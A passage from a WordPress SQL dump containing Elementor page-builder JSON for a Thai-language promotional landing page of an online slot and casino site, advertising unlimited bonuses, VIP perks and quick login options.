99,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2054,299,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>megabet333 <\\/b><\\/a><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e48\\u0e32\\u0e22\\u0e43\\u0e2b\\u0e0d\\u0e48 megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 